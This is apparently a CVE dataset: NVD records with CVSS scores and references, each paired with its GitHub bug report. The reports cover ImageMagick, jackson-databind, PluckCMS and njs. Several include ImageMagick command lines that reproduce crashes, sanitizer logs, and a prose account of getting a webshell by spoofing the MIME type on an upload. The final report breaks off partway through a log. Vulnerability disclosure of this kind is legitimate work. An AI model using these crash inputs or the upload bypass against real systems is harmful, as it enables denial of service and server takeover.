Heap buffer overflow sometimes occur. To trigger this bug, please run the command for several times.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run cmd:
`magick "-seed" "0" "-black-point-compensation" "-fuzz" "238" "(" "magick:logo" "-normalize" "-cycle" "615" ")" "(" "magick:rose" "-gaussian-blur" "4" ")" "(" "magick:granite" "-convolve" "207,117,126,202,52,59,196,21,46,216,32,49,172,14,116,115,203,20,219,21,194,58,155,117,148,208,229,218,151,151,171,239,212,207,77,212,81,32,23,137,63,164,67,85,47,13,85,96,85,86,244,168,218,41,98,108,208,221,77,5,45,117,102,5,89,150,47,36,214,0,20,255,14,83,77,191,109,40,32,245,112" ")" "-strokewidth" "58" "-complex" "subtract" "-layers" "compare-overlay" ""
`
ASAN log about heap buffer over-flow.
```
==18953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000020200 at pc 0x0000014f4b4e bp 0x7fa64464bc30 sp 0x7fa64464bc28
READ of size 4 at 0x619000020200 thread T2
#0 0x14f4b4d in .omp_outlined._debug__ MagickCore/fourier.c:314:19
#1 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3
#2 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#3 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
#4 0x7fa64f93bb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20)
#5 0x7fa64f97b417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417)
#6 0x7fa651fb76da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
#7 0x7fa64f41f88e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
0x619000020200 is located 0 bytes to the right of 896-byte region [0x61900001fe80,0x619000020200)
allocated by thread T2 here:
#0 0x4f09b0 in __interceptor_posix_memalign (install/bin/magick+0x4f09b0)
#1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37
#3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12
#4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0x14f2984 in .omp_outlined._debug__ MagickCore/fourier.c:249:8
#7 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3
#8 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#9 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
Thread T2 created by T0 here:
#0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0)
#1 0x7fa64f979110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110)
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:314:19 in .omp_outlined._debug__
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information: CC=clang-7 CXX=clang++-7
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow in MagickCore/fourier.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1588/comments | 7 | 2019-06-11T03:25:05Z | 2019-07-08T01:55:44Z | https://github.com/ImageMagick/ImageMagick/issues/1588 | 454,462,914 | 1,588 |
CVE-2018-11307 | 2019-07-09T16:15:12.807 | An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:0782"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1822"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1823"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2804"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2858"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3002"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3140"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3149"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3892"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:4037"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2032"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d%40%3Cissues.lucene.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD",
"versionEndExcluding": "2.6.7.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "44F16CE8-7CAD-4846-A38E-8192D56AB09B",
"versionEndExcluding": "2.7.9.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02EA57F3-507D-4E70-BA77-D235A59C2800",
"versionEndExcluding": "2.8.11.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "429C17F2-AB58-4BC0-8EB0-AF3322DDD528",
"versionEndExcluding": "2.9.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.9.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
"matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "064E7BDD-4EF0-4A0D-A38D-8C75BAFEDCEF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:clusterware:12.1.0.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6C9084DB-329E-403F-8D0A-5B9F53183714",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9615B3B8-B176-4359-97B5-D2E2FEE5BFEA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE",
"versionEndExcluding": "11.2.0.3.23",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BFD43191-E67F-4D1B-967B-3C7B20331945",
"versionEndExcluding": "12.2.0.1.19",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "12.2.0.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "062C588A-CBBA-470F-8D11-2F961922E927",
"versionEndExcluding": "13.9.4.2.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "13.9.4.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "6FD0EC40-B96B-4E9C-9A81-4E65C4B9512E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/FasterXML/jackson-databind/issues/2032 | [
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | A new potential gadget type from MyBatis (https://github.com/mybatis/mybatis-3) has been reported. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled.
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem.
Mitre id: CVE-2018-11307
Original vulnerability discoverer:
吴桂雄 Wuguixiong
Fixed in
* 2.9.5 and later
* 2.8.11.2
* 2.7.9.4
* 2.6.7.3
| Block one more gadget type (mybatis, CVE-2018-11307) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2032/comments | 4 | 2018-05-10T04:23:03Z | 2020-12-02T04:03:22Z | https://github.com/FasterXML/jackson-databind/issues/2032 | 321,805,044 | 2,032 |
CVE-2019-13454 | 2019-07-09T17:15:11.850 | ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/109099"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/1ddcf2e4f28029a888cadef2e757509ef5047ad8"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1629"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/4f31d78716ac94c85c244efcea368fea202e2ed4"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-54:q16:*:*:*:*:*:*",
"matchCriteriaId": "9A2BD25B-C7E9-4B57-BF88-0C86D9D3C318",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1629 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a division by zero at MagickCore/layer.c:1616:30
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run following cmd:
`magick "-seed" "0" "-delay" "34<" "(" "magick:rose" "+repage" ")" "(" "magick:rose" "+repage" ")" "-encoding" "Symbol" "-layers" "remove-dups" "-quiet" "tmp"`
This is triggered at `time = curr->delay*1000/curr->ticks_per_second;` due to curr->ticks_per_second.
```
1605 for (; (next=GetNextImageInList(curr)) != (Image *) NULL; curr=next)
1606 {
1607 if ( curr->columns != next->columns || curr->rows != next->rows
1608 || curr->page.x != next->page.x || curr->page.y != next->page.y )
1609 continue;
1610 bounds=CompareImagesBounds(curr,next,CompareAnyLayer,exception);
1611 if ( bounds.x < 0 ) {
1612 /*
1613 the two images are the same, merge time delays and delete one.
1614 */
1615 size_t time;
1616 time = curr->delay*1000/curr->ticks_per_second;
1617 time += next->delay*1000/next->ticks_per_second;
1618 next->ticks_per_second = 100L;
1619 next->delay = time*curr->ticks_per_second/1000;
1620 next->iterations = curr->iterations;
1621 *images = curr;
1622 (void) DeleteImageFromList(images);
1623 }
1624 }
```
Here's USAN log.
```
MagickCore/layer.c:1616:30: runtime error: division by zero
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior MagickCore/layer.c:1616:30 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28916==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x7fe11baee9e7 bp 0x7ffc60e12250 sp 0x7ffc60e11ec0 T0)
#0 0x7fe11baee9e6 in RemoveDuplicateLayers MagickCore/layer.c:1616:30
#1 0x7fe11a2600a8 in CLIListOperatorImages MagickWand/operation.c:4266:15
#2 0x7fe11a273102 in CLIOption MagickWand/operation.c:5308:14
#3 0x7fe119c6aef4 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#4 0x7fe119c6dc54 in MagickImageCommand MagickWand/magick-cli.c:796:5
#5 0x7fe119d1400e in MagickCommandGenesis MagickWand/mogrify.c:185:14
#6 0x527976 in MagickMain utilities/magick.c:149:10
#7 0x5268e1 in main utilities/magick.c:180:10
#8 0x7fe113884b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x41b069 in _start (install/bin/magick+0x41b069)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: UNKNOWN SIGNAL MagickCore/layer.c:1616:30 in RemoveDuplicateLayers
==28916==ABORTING
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-54 Q16 x86_64 2019-07-07 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 CFLAGS="-fsanitize=address,undefined -g" CXXFLAGS="-fsanitize=address,undefined -g" ./configure --disable-openmp --without-png
<!-- Thanks for reporting the issue to ImageMagick! -->
| Division by Zero at MagickCore/layer.c:1616 | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1629/comments | 4 | 2019-07-07T02:34:55Z | 2019-08-18T16:37:24Z | https://github.com/ImageMagick/ImageMagick/issues/1629 | 464,908,207 | 1,629 |
CVE-2019-1010062 | 2019-07-16T13:15:11.410 | PluckCMS 4.7.4 and earlier is affected by: CWE-434 Unrestricted Upload of File with Dangerous Type. The impact is: get webshell. The component is: data/inc/images.php line36. The attack vector is: modify the MIME TYPE on HTTP request to upload a php file. The fixed version is: after commit 09f0ab871bf633973cfd9fc4fe59d4a912397cf8. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/commit/09f0ab871bf633973cfd9fc4fe59d4a912397cf8"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/44"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluckcms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "864B3716-962D-4BC2-8A56-E483D47AB4B7",
"versionEndExcluding": null,
"versionEndIncluding": "4.7.4",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/pluck-cms/pluck/issues/44 | [
"Third Party Advisory"
] | github.com | [
"pluck-cms",
"pluck"
] | Hi! I found a Unrestricted File Upload Vulnerability on PluckCMS 4.7.4.
I found i can bypass the filetype detection on background site by modifying the MIME type on HTTP request. And with uploading a PHP File, i can get a webshell.
![](http://ony7wielg.bkt.clouddn.com/20170412149193291619562.png)
Please fix it ASAP and contact me to get more details(i did not find you email) :
My email:[email protected] | [Vulnerability] Unrestricted File Upload in background site | https://api.github.com/repos/pluck-cms/pluck/issues/44/comments | 2 | 2017-04-11T17:52:00Z | 2018-09-03T08:40:42Z | https://github.com/pluck-cms/pluck/issues/44 | 221,030,477 | 44 |
CVE-2019-13617 | 2019-07-16T17:15:12.753 | njs through 0.3.3, used in NGINX, has a heap-based buffer over-read in nxt_vsprintf in nxt/nxt_sprintf.c during error handling, as demonstrated by an njs_regexp_literal call that leads to an njs_parser_lexer_error call and then an njs_parser_scope_error call. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15093"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/174"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2A12AFA-F1E5-4E07-B86C-A6CC93CD2081",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/174 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Hello, I am shuoz of alpha lab of topsec. I fuzz njs and found a heap overflow bug.
./njs ./tmp.js
```
fuzz@fuzz:~/Desktop/fuzzproject/njs/build$ ./njs ./tmp.js
INFO: Seed: 2208882516
INFO: Loaded 1 modules (8780 guards): [0x8a15a0, 0x8a9ed0),
./njs: Running 1 inputs 1 time(s) each.
Running: crash-0c9fced77823aa506239627a5473e8c4bb55ec96
=================================================================
==16711==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61100000039b at pc 0x0000004dc4e2 bp 0x7ffc117a8770 sp 0x7ffc117a7f20
READ of size 217 at 0x61100000039b thread T0
